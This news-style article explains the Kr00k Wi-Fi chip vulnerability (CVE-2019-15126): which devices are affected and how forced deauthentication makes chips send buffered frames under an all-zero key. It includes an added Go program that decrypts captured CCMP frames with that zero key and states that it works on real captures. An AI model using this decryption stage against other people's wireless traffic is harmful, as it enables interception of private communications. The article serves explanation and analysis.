A new hardware vulnerability in Wi-Fi chips manufactured by Broadcom and Cypress has been discovered by security researchers. These chips power more than a billion devices, including smartphones, tablets, laptops, routers and IoT gadgets.
The high-severity vulnerability has been dubbed ‘Kr00k’ and is tracked as CVE-2019-15126. It lets an attacker within radio range intercept and decrypt some of the wireless network packets transmitted over the air by a vulnerable device.
The attacker does not need to be connected to the victim’s wireless network. The flaw affects vulnerable devices that use WPA2-Personal or WPA2-Enterprise with AES-CCMP encryption to protect their network traffic.
ESET researchers stated that their tests confirmed that client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry Pi (Pi 3) and Xiaomi (Redmi), as well as some access points by Asus and Huawei, were vulnerable to Kr00k.
The Kr00k flaw is related to the KRACK (Key Reinstallation Attacks) technique against WPA2; ESET’s researchers found Kr00k while investigating KRACK. KRACK is often described as a way to hack Wi-Fi passwords, but it does not recover the passphrase: it tricks a client into reinstalling an already-used session key during the WPA2 four-way handshake, forcing nonce reuse so that traffic can be decrypted or replayed.
Some points worth noting:
- The vulnerability does not lie in the Wi-Fi encryption protocol itself, but in the way the affected chips implement the encryption.
- It does not let attackers connect to your Wi-Fi network, so on its own it does not enable man-in-the-middle attacks or exploitation of other connected devices.
- It does not give attackers your Wi-Fi password.
- It does not affect devices using the latest Wi-Fi security standard, WPA3.
- It does allow attackers to capture and decrypt some wireless packets.
- The flaw breaks encryption at the wireless link layer only; it has nothing to do with TLS, so traffic to sites using HTTPS remains protected by TLS.
How the Kr00k attack works
When a device is disassociated from the wireless network, the Wi-Fi chip clears the session key (the temporal key, TK) from memory by setting it to all zeros. The affected chips, however, still transmit any data frames left in their transmit buffer after the disassociation, and encrypt them with that all-zero key.
An attacker within radio range can therefore force disassociations over and over by sending deauthentication frames (which are unauthenticated unless Protected Management Frames, 802.11w, are in use), and capture the frames flushed after each one, “potentially containing sensitive data, including DNS, ARP, ICMP, HTTP, TCP, and TLS packets.”
Because the flaw also affects chips embedded in many wireless routers, an attacker can also intercept and decrypt traffic transmitted by the access point to connected devices that are not themselves vulnerable to Kr00k, whether patched or using different Wi-Fi chips: it is the access point’s flushed frames that leave under the zero key.
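The mechanism above, as an added example that is not part of the original article or of ESET’s research tooling: a minimal CCMP (AES-CCM, 8-byte MIC) encryptor and decryptor in Go for a non-QoS data frame, with the nonce (priority || A2 || PN) and the AAD (masked FC || A1 || A2 || A3 || masked sequence control) built as 802.11 specifies. The station and AP addresses, the packet number and the payload are constructed here, and all function names are this example’s own. Decrypting with the all-zero TK succeeds only for a frame that really was encrypted under it (the Kr00k case) and fails the MIC check on a normally keyed frame, which is also how an analyst would test a capture for zero-key frames.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Non-QoS three-address CCMP data frame: 24-byte MAC header | 8-byte CCMP header | ciphertext | 8-byte MIC.
const macHdrLen, ccmpHdrLen, micLen = 24, 8, 8
// ZeroTK is the all-zero temporal key a Kr00k-affected chip uses for frames flushed after disassociation.
var ZeroTK = make([]byte, 16)
func be16(v int) []byte { return []byte{byte(v >> 8), byte(v)} }

// ccmAuth is the CBC-MAC half of AES-CCM (RFC 3610 with M=8, L=2):
// MIC = CBC-MAC(B0 || len(aad) || aad || pad || payload || pad)[:8].
func ccmAuth(blk cipher.Block, nonce, aad, payload []byte) []byte {
	x := make([]byte, 16)
	absorb := func(b []byte) { // CBC-MAC over b, zero-padded to whole blocks
		for i := 0; i < len(b); i += 16 {
			for j := 0; j < 16 && i+j < len(b); j++ {
				x[j] ^= b[i+j]
			}
			blk.Encrypt(x, x)
		}
	}
	b0 := append([]byte{0x59}, nonce...) // flags: Adata | ((M-2)/2)<<3 | (L-1)
	absorb(append(b0, be16(len(payload))...))
	absorb(append(be16(len(aad)), aad...))
	absorb(payload)
	return x[:micLen]
}
// ccmCTR is the CTR half of AES-CCM: counter block 0 masks the MIC, blocks 1..n the payload.
// XOR is its own inverse, so the same function encrypts and decrypts.
func ccmCTR(blk cipher.Block, nonce, payload, mic []byte) (out, outMIC []byte) {
	ctr, ks := append(append([]byte{0x01}, nonce...), 0, 0), make([]byte, 16) // flags L-1 | nonce | counter
	blk.Encrypt(ks, ctr)
	outMIC = make([]byte, micLen)
	for i := range outMIC {
		outMIC[i] = mic[i] ^ ks[i]
	}
	out = make([]byte, len(payload))
	for i := range out {
		if i%16 == 0 {
			copy(ctr[14:], be16(i/16+1))
			blk.Encrypt(ks, ctr)
		}
		out[i] = payload[i] ^ ks[i%16]
	}
	return out, outMIC
}

// ccmpParams derives the CCMP nonce (priority || A2 || PN5..PN0) and the 22-byte AAD
// (masked FC || A1 || A2 || A3 || masked SeqCtl) from the MAC header and CCMP header.
func ccmpParams(hdr, cc []byte) (nonce, aad []byte) {
	nonce = append([]byte{0}, hdr[10:16]...) // priority 0 for a non-QoS data frame
	nonce = append(nonce, cc[7], cc[6], cc[5], cc[4], cc[1], cc[0])
	aad = []byte{hdr[0] & 0x8f, (hdr[1] & 0x87) | 0x40} // subtype, Retry/PwrMgt/MoreData masked; Protected set
	return nonce, append(append(aad, hdr[4:22]...), hdr[22]&0x0f, 0) // sequence number masked, fragment kept
}
// EncryptCCMP protects hdr+payload under tk; used here only to build sample captures.
func EncryptCCMP(hdr []byte, pn uint64, payload, tk []byte) []byte {
	blk, _ := aes.NewCipher(tk) // 16-byte keys only in this example
	hdr = append([]byte{}, hdr...)
	hdr[1] |= 0x40 // Protected Frame bit
	cc := []byte{byte(pn), byte(pn >> 8), 0, 0x20, byte(pn >> 16), byte(pn >> 24), byte(pn >> 32), byte(pn >> 40)}
	nonce, aad := ccmpParams(hdr, cc)
	ct, encMIC := ccmCTR(blk, nonce, payload, ccmAuth(blk, nonce, aad, payload))
	return append(append(append(hdr, cc...), ct...), encMIC...)
}
// DecryptCCMP decrypts a captured frame under tk; a wrong key shows up as a MIC mismatch.
func DecryptCCMP(frame, tk []byte) ([]byte, error) {
	if len(tk) != 16 || len(frame) < macHdrLen+ccmpHdrLen+micLen || frame[macHdrLen+3]&0x20 == 0 {
		return nil, errors.New("need a 16-byte TK and a CCMP (ExtIV) data frame")
	}
	blk, _ := aes.NewCipher(tk) // cannot fail: key length checked above
	nonce, aad := ccmpParams(frame[:macHdrLen], frame[macHdrLen:macHdrLen+ccmpHdrLen])
	body, mic := frame[macHdrLen+ccmpHdrLen:len(frame)-micLen], frame[len(frame)-micLen:]
	pt, tag := ccmCTR(blk, nonce, body, mic)
	if !bytes.Equal(ccmAuth(blk, nonce, aad, pt), tag) {
		return nil, errors.New("MIC mismatch: frame was not encrypted under this key")
	}
	return pt, nil
}

// SampleHeader is a constructed header: STA 02:00:00:00:00:01 -> AP/BSSID 02:00:00:00:00:aa.
func SampleHeader() []byte {
	ap, sta := []byte{2, 0, 0, 0, 0, 0xaa}, []byte{2, 0, 0, 0, 0, 1}
	hdr := append([]byte{0x08, 0x01, 0, 0}, ap...)                 // Data, ToDS=1, A1=BSSID
	return append(append(append(hdr, sta...), ap...), 0x10, 0x00) // A2=SA, A3=DA, SeqCtl
}

func main() {
	pt := []byte("constructed plaintext: DNS query for example.com")
	leaked, err := DecryptCCMP(EncryptCCMP(SampleHeader(), 0x42, pt, ZeroTK), ZeroTK)
	fmt.Printf("frame flushed after deauth, zero TK: %q (err=%v)\n", leaked, err)
	_, err = DecryptCCMP(EncryptCCMP(SampleHeader(), 0x43, pt, bytes.Repeat([]byte{0xa5}, 16)), ZeroTK)
	fmt.Println("normal frame tried with zero TK:", err)
}
```

Against a real capture, feed every protected data frame to DecryptCCMP with ZeroTK; a MIC that verifies means the frame left the chip encrypted under the cleared key, and a MIC mismatch means it was keyed normally. QoS data frames carry a 26-byte header and put the TID in the nonce’s first byte, which this minimal parser does not handle, and the code is an analysis aid rather than a constant-time production implementation.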
The researchers reported the issue last year to both affected chip manufacturers, Broadcom and Cypress, as well as to many affected device manufacturers.
Apple has already released patches, while other vendors are still testing the issue against their devices.